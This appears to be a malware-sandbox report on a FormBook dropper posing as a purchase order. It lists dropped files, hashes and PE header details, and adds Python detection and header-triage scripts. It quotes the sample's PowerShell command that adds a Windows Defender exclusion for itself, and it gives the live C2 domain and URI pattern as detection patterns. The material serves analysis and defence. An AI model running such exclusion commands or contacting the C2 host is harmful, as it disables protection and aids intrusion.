              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.7.5.4.2.6.5.5.7.5.4.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.7.5.4.2.9.2.6.0.6.6.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.8.f.5.e.1.4.-.b.f.4.6.-.4.e.5.9.-.9.c.0.7.-.e.5.c.c.b.0.c.9.1.f.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.2.7.8.a.b.f.a.-.1.e.b.7.-.4.4.5.0.-.8.a.c.a.-.2.a.7.3.5.8.2.9.c.e.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.u.r.c.h.a.s.e._.o.r.d.e.r._.3.9.7.4.8.4.6.5.8.4.6.4.9.7.4.9.4.5.6.4.8.4.4.7.5.6.4.8.4.5...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.f.8.-.0.0.0.1.-.0.0.1.7.-.b.1.d.c.-.3.e.7.0.0.a.0.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.9.7.a.0.d.9.0.a.d.9.1.e.8.8.3.2.b.6.d.0.b.e.f.b.f.2.7.5.b.1.a.0.0.0.0.0.9.0.4.!.0.0.0.0.9.6.8.d.4.d.6.0.0.d.d.0.0.5.7.9.f.6.5.9.4.e.3.b.1.e.f.f.9.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WER188E.tmp.WERInternalMetadata.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):8508
              Entropy (8bit):3.708486672831689
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNizCEI636YS8SUtbgmfZ0SRCprh89bqSsfKOm:RrlsNi0636YpSUtbgmfmSnqRfa
              MD5:70E73B8C20BA78CAB9A68958DFD86DDB
              SHA1:C74C8B8EBCD2885C250B7D2001A478D736EBDCF6
              SHA-256:C7D24C15199B7EB4BDE1039E51C34B0003113156B800AC21EBC264DB70B2E5A5
              SHA-512:6C91DEC4019D136DCD3B6A1E7B5F358CD50B23D5630D707C0F2112098B35A55AE3DA7C5BEF60B678D7ED76C7CEDEDFE73DE49C24115ED725914500368FF8C619
              Malicious:false
              Reputation:low
              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.9.2.<./.P.i.d.>.......
              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1989.tmp.xml
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4830
              Entropy (8bit):4.565106092606366
              Encrypted:false
              SSDEEP:48:cvIwSD8zs4JgtWI9NbVWSC8BC8fm8M4JwOFFrm+q8vprPU3B0HEd:uITf+2YSNdJwwmKBc3B0HEd
              MD5:C78494C46594307F2CF586AD4C1D92E6
              SHA1:EB7BBAA89FB1369B2D599D4D887C4D65CFE0DC5F
              SHA-256:B7AA4A14BBFAC93CF945AE533AB0018908878BF119EF183562CA64CEADE9368E
              SHA-512:11BC81442571591A8828C87D73192DAA6B7942FAEF20339850DF516CB2C62A362025C7F0A5F61BAB47BB196C20E060D798774FF230286A0903B6707119A5044F
              Malicious:false
              Reputation:low
              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874247" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC3.tmp.dmp
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 17:37:07 2021, 0x1205a4 type
              Category:dropped
              Size (bytes):318737
              Entropy (8bit):3.6212068729576066
              Encrypted:false
              SSDEEP:3072:5mo23tnT8aS0Yjd+pmhdaoMoM0yHUCgUIl9gIOgF55m2LmbCtN07RFEm:sPB20ppm7XMrTTjO9RpDXLMCI
              MD5:61F48E9B21B55CD023C2B3F28868A1DC
              SHA1:B958E2B05023E8C90164CF8064246D1BFD33B017
              SHA-256:CBC7A0246139ED4EA404D43EB9CFF4BB7A570CC34A6E957BB4A58B39913B02E7
              SHA-512:C5F58691CBA34BDD658CF9FFC6A9CA99879B9393E78619BE52E3290B16679CE651F4B20D55A8AFAD387C2A1025B73CA02F646502B077ED3CAEAA589A0A356C8E
              Malicious:false
              Reputation:low
              Preview: MDMP....... .......C=5`...................U...........B...... ,......GenuineIntelW...........T...........%=5`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):14734
              Entropy (8bit):4.993014478972177
              Encrypted:false
              SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
              MD5:8D5E194411E038C060288366D6766D3D
              SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
              SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
              SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):22184
              Entropy (8bit):5.604919130978974
              Encrypted:false
              SSDEEP:384:htCDLKQn49Oabr+eSBKn+ultIo3P7Q99g9SJUeRa1BMrm7ZSRV7Y8Fc64I+iGm:xd/4K+ultp3E89XehaAKa
              MD5:0FF05A4A465A41B20079D0A01C7514E8
              SHA1:5B4B33D86F729622CE54604CA902F5C058E65CFE
              SHA-256:79FBCE1E18636D44D5A784C53878A7951090F43878F1F1A3D5365A8B14F99DC2
              SHA-512:2953C5CECE9A4DDD0FA8647EBAC12627CF1BBF2536DDD17A8380D411F97406C56401CECB109A05EE7119D0CCAF3E6E13498C84097A1E1223355C88982D061D7E
              Malicious:false
              Reputation:low
              Preview: @...e...........c.........'...........h.8............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjibhhft.vtv.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zj10wm5e.0o0.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\Documents\20210223\PowerShell_transcript.648351.2_U4nhBu.20210223093657.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5925
              Entropy (8bit):5.421356566130499
              Encrypted:false
              SSDEEP:96:BZdhFNvqDo1ZxZohFNvqDo1ZZFTdjZ6hFNvqDo1ZcUtt1Zi:m
              MD5:9A199CC4BCB1CCEA57554AA3A9BC66E5
              SHA1:AE172DA3FB8F3020D8B54CC2522BBA7B4B0CEA20
              SHA-256:BF43D9594F6118484C13FEA3FC905A014486CDD14C1A7A07BD7394511A0B02BA
              SHA-512:25B30529537C94C9DFB88C636424E2C35F16B762A1AC89501A4B9560303B42ADF644C7CE0C2FD23ED3EC2CAF33ADF1AFBB8F4EA5CB3155B8B29A8009427F85BB
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210223093715..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe -Force..Process ID: 6948..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210223093715..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe -Force..**********************..Windows PowerShell transcript start..Start time: 2021022309412
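The transcript above is the evidence behind the "Adds a directory exclusion to Windows Defender" signature: the sample spawned powershell.exe with `Add-MpPreference -ExclusionPath <its own path on the Desktop> -Force`, so Defender would stop scanning the file. The associated-sample table earlier on the page shows the other indicator worth a rule: every related sample's C2 URL has the shape coroloboxorozor.com/base/<32 hex>.html. The following Python is an added example, not part of the Joe Sandbox report, that checks both in sample proxy-log and transcript lines; the log lines are constructed for the example (the proxy format, the example.com/example.net entries and the 'C:\Program Files\Vendor\build' exclusion are assumptions, the FormBook URIs and the Add-MpPreference command are taken from this page).

```python
"""Detection checks for the two behaviours recorded on this page: the FormBook C2 URI
shape in the associated-sample table (coroloboxorozor.com/base/<32 hex>.html) and the
Defender exclusion the PowerShell transcript captured (Add-MpPreference -ExclusionPath
<dropped sample> -Force). Added example, not part of the report; the proxy log and
transcript lines below are constructed for it."""
import re
from typing import Dict, List, Optional

# FormBook-style C2 path: one directory segment, then a 32-hex-character .html name
C2_PATH_RE = re.compile(r"^/[A-Za-z0-9_-]+/[0-9A-Fa-f]{32}\.html$")
URL_RE = re.compile(r"^https?://([^/\s]+)(/\S*)$")

# Add-MpPreference with any exclusion switch; the value may be quoted or bare
MP_EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-(ExclusionPath|ExclusionProcess|ExclusionExtension)\s+"
    r"(\"[^\"]+\"|'[^']+'|\S+)",
    re.IGNORECASE,
)
# A dropper excludes itself under the user profile; vendors exclude program directories
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(Desktop|Downloads|Documents|AppData)\\", re.IGNORECASE
)

# Constructed proxy log: time, client, method, URL, status
PROXY_LOG = [
    "2021-02-23T09:36:42Z 192.168.2.3 GET http://coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html 200",
    "2021-02-23T09:36:50Z 192.168.2.3 GET http://www.example.com/base/index.html 200",
    "2021-02-23T09:36:55Z 192.168.2.3 GET https://cdn.example.net/assets/AEF764C22A189B57AC28E3EBBC72AEBF.png 200",
    "2021-02-23T09:37:01Z 192.168.2.3 GET http://coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html 404",
]
# Constructed transcript lines, modelled on the transcript dropped by the sample
TRANSCRIPT = [
    "Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "Add-MpPreference -ExclusionPath C:\\Users\\user\\Desktop\\Purchase_order_397484658464974945648447564845.exe -Force",
    "PS>Add-MpPreference -ExclusionPath C:\\Users\\user\\Desktop\\Purchase_order_397484658464974945648447564845.exe -Force",
    "PS>Get-MpPreference",
    "PS>Add-MpPreference -ExclusionPath 'C:\\Program Files\\Vendor\\build' -Force",
]


def check_proxy_line(line: str) -> Optional[Dict[str, str]]:
    """Flag a request whose path matches the C2 URI shape, regardless of host."""
    fields = line.split()
    if len(fields) < 5:
        return None
    m = URL_RE.match(fields[3])
    if not m or not C2_PATH_RE.match(m.group(2)):
        return None
    return {"type": "formbook_c2_uri", "src": fields[1], "host": m.group(1), "path": m.group(2)}


def check_transcript_line(line: str) -> Optional[Dict[str, str]]:
    """Flag an Add-MpPreference exclusion; user-profile paths get the higher severity."""
    m = MP_EXCLUSION_RE.search(line)
    if not m:
        return None
    value = m.group(2).strip("\"'")
    severity = "high" if USER_WRITABLE_RE.search(value) else "medium"
    return {"type": "defender_exclusion", "switch": m.group(1), "value": value, "severity": severity}


def scan(proxy_lines: List[str], transcript_lines: List[str]) -> List[Dict[str, str]]:
    """Run both checks; a transcript repeats the command in its header, so deduplicate."""
    findings = [f for f in map(check_proxy_line, proxy_lines) if f]
    seen = set()
    for f in map(check_transcript_line, transcript_lines):
        if f and (f["switch"].lower(), f["value"].lower()) not in seen:
            seen.add((f["switch"].lower(), f["value"].lower()))
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in scan(PROXY_LOG, TRANSCRIPT):
        print(finding)
```

The path check deliberately ignores the host: FormBook operators rotate domains per campaign, while the one-directory-plus-32-hex-.html shape is what stays constant across the samples listed on this page. The exclusion check rates a user-profile path higher than a program directory because a legitimate installer rarely needs to exclude something on the Desktop; Defender's own operational log (Microsoft-Windows-Windows Defender/Operational, event ID 5007) records the same change and is the place to confirm it when transcription is not enabled.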

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):4.402866799132695
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              • Win32 Executable (generic) a (10002005/4) 49.97%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:Purchase_order_397484658464974945648447564845.exe
              File size:639488
              MD5:9d8635210670e8b332120a969dfa269e
              SHA1:968d4d600dd00579f6594e3b1eff98b46b422893
              SHA256:031e72b45d66c3365bfe3c7ace3c4c2a79facffa8daa7b483c77350a791c0133
              SHA512:1144be146d68cd958925df04a0933dd31347c3b41da3eb75cf486ce1d1982661e542e946eb3681e994687db21be987bd439a9e2c7beb65cf3be512976f469ed3
              SSDEEP:6144:2ATB+CjnoFug/a0qfvoC4eTzyOgW1MSpjCPzGcMrIVq/0qPmDbaT5lBWuDrRZAX:2qADSfbdTzcGVJVKq/Tm3iT0UrcX
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0......&........... ........@.. ....................... .......%....@................................

              File Icon

              Icon Hash:10d0c4ccccc4f000

              Static PE Info

              General

              Entrypoint:0x49b8ee
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
              The stamp lies 77 years after the analysis date, which is what the "Binary contains a suspicious time stamp" signature keys on. Values with the high bit set are also what deterministic .NET builds (Roslyn /deterministic) write into this field, so on its own the field does not prove deliberate timestomping; it does confirm the value is not a real build time.
              TLS Callbacks:
              CLR (.Net) Version:v4.0.30319
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Authenticode Signature

              Signature Valid:
              Signature Issuer:
              Signature Validation Error:
              Error Number:
              Not Before, Not After
                Subject Chain
                  Version:
                  Thumbprint MD5:
                  Thumbprint SHA-1:
                  Thumbprint SHA-256:
                  Serial:
              The General table reports "Digitally signed: true" and the security data directory points at an Authenticode blob (file offset 0x9a200, 0x1a28 bytes), but every signature field above is empty: no issuer, validity window, thumbprint or validation result was recorded. Treat the signature as unverified until it is checked separately (for example with Get-AuthenticodeSignature or signtool verify); a present-but-unvalidated signature blob is not evidence of a trusted publisher.
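The three static facts an analyst wants to confirm from this block without trusting the report are the far-future time stamp, the presence of a CLR header (which makes the native entry point irrelevant) and whether an Authenticode blob exists at all. The following Python is an added example, not Joe Sandbox code or the sample's code: it builds a headers-only PE32 image in memory from the values on this page (time stamp 0xF27DBEB9, the data directories listed below, ImageBase 0x400000, entry RVA 0x9b8ee) and runs a small triage over the parsed header. The field layout is the documented PE32 optional-header layout; the in-memory image, the linker version and the triage wording are the example's own assumptions.

```python
"""Header triage for the static findings above: the far-future TimeDateStamp, the CLR
(COM descriptor) directory and the Authenticode (security) directory that the report
lists but does not validate. Added example, not Joe Sandbox code: the PE32 image is
constructed in memory from this sample's header values, nothing is read from disk, and
the output is header facts plus triage notes, not a verdict."""
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

DIR_IMPORT, DIR_RESOURCE, DIR_SECURITY, DIR_BASERELOC = 1, 2, 4, 5
DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14
# PE32 optional header up to (not including) the data directories: 96 bytes
OPT_HDR_PE32 = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def build_minimal_pe32(timestamp: int, dirs: Dict[int, Tuple[int, int]]) -> bytes:
    """Constructed PE32 with headers only (no sections): enough to parse, not to load."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos += b"\0" * (e_lfanew - len(dos))
    # COFF: i386, 0 sections, TimeDateStamp, no symbols, 0xE0-byte optional header,
    # Characteristics EXECUTABLE_IMAGE | 32BIT_MACHINE (as in the report)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 0xE0, 0x0102)
    opt = struct.pack(
        OPT_HDR_PE32,
        0x10B, 48, 0,                                  # PE32 magic, linker version (assumed)
        0, 0, 0, 0x9B8EE, 0x2000, 0x9C000, 0x400000,   # code sizes, entry RVA, bases, ImageBase
        0x2000, 0x200,                                 # section / file alignment
        4, 0, 4, 0, 4, 0,                              # OS, image, subsystem versions
        0, 0xA2000, 0x200, 0,                          # reserved, SizeOfImage, SizeOfHeaders, checksum
        2, 0x8540,                                     # WINDOWS_GUI; NX|DYNAMIC_BASE|NO_SEH|TS_AWARE
        0x100000, 0x1000, 0x100000, 0x1000, 0, 16,     # stack/heap, loader flags, 16 directories
    )
    dd = b"".join(struct.pack("<II", *dirs.get(i, (0, 0))) for i in range(16))
    return dos + b"PE\0\0" + coff + opt + dd


def parse_pe_headers(data: bytes) -> Dict:
    """Read the COFF and PE32 optional-header fields the triage needs (PE32 only)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, _nsec, timestamp, _, _, _opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    return {"machine": machine, "timestamp": timestamp, "characteristics": chars,
            "entry_rva": entry_rva, "image_base": image_base, "dirs": dirs}


def triage(hdr: Dict, analysis_time: datetime) -> List[str]:
    """Turn header facts into the notes an analyst wants next to the report's signatures."""
    notes = []
    ts = hdr["timestamp"]
    built = EPOCH + timedelta(seconds=ts)
    if built > analysis_time:
        notes.append(f"timestamp {ts:#x} ({built:%Y-%m-%d}) postdates the analysis date")
    if ts & 0x80000000:
        # Roslyn /deterministic writes a hash with the high bit set into this field
        notes.append("timestamp high bit set: also produced by deterministic .NET builds, "
                     "so the field alone is not proof of timestomping")

    def present(i: int) -> bool:
        return i < len(hdr["dirs"]) and hdr["dirs"][i] != (0, 0)

    if present(DIR_COM_DESCRIPTOR):
        notes.append("CLR header present: managed image, native entry is only the _CorExeMain stub")
    if present(DIR_SECURITY):
        off, size = hdr["dirs"][DIR_SECURITY]
        notes.append(f"Authenticode blob at file offset {off:#x} ({size} bytes): "
                     "presence only, the signature is not verified here")
    else:
        notes.append("no Authenticode blob")
    return notes


# Values from this report's Static PE Info / Data Directories
SAMPLE_TIMESTAMP = 0xF27DBEB9
SAMPLE_DIRS = {DIR_IMPORT: (0x9B8A0, 0x4B), DIR_RESOURCE: (0x9C000, 0x2224),
               DIR_SECURITY: (0x9A200, 0x1A28), DIR_BASERELOC: (0xA0000, 0xC),
               DIR_IAT: (0x2000, 0x8), DIR_COM_DESCRIPTOR: (0x2008, 0x48)}
ANALYSIS_TIME = datetime(2021, 2, 23, tzinfo=timezone.utc)


def triage_sample() -> List[str]:
    return triage(parse_pe_headers(build_minimal_pe32(SAMPLE_TIMESTAMP, SAMPLE_DIRS)), ANALYSIS_TIME)


if __name__ == "__main__":
    for note in triage_sample():
        print(note)
```

To run the same triage on the real file, replace the constructed image with the bytes of the sample and keep the analysis date; the security-directory entry is a raw file offset rather than an RVA, which is why the report lists no section for it, and verifying the blob it points at (certificate chain, countersignature, hash match) is a separate step that this check deliberately does not claim to do.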

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  (the remaining 97 instructions of the preview decode as add byte ptr [eax], al, i.e. zero bytes following the stub)
                  00402000h is ImageBase 0x400000 plus the 8-byte IAT at RVA 0x2000, whose single entry is mscoree.dll!_CorExeMain (see Imports). This is the standard native stub of a .NET executable: the real logic is managed IL under the CLR header, and this entry point tells you nothing about the sample's behaviour.

                  Data Directories

                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b8a0 | 0x4b | .text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x2224 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x9a200 | 0x1a28 | (raw file offset, not section-mapped)
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                  Sections

                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x2000 | 0x998f4 | 0x99a00 | False | 0.35375400478 | data | 4.33662845536 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc | 0x9c000 | 0x2224 | 0x2400 | False | 0.856662326389 | data | 7.56673368954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0xa0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  Name | RVA | Size | Type | Language | Country
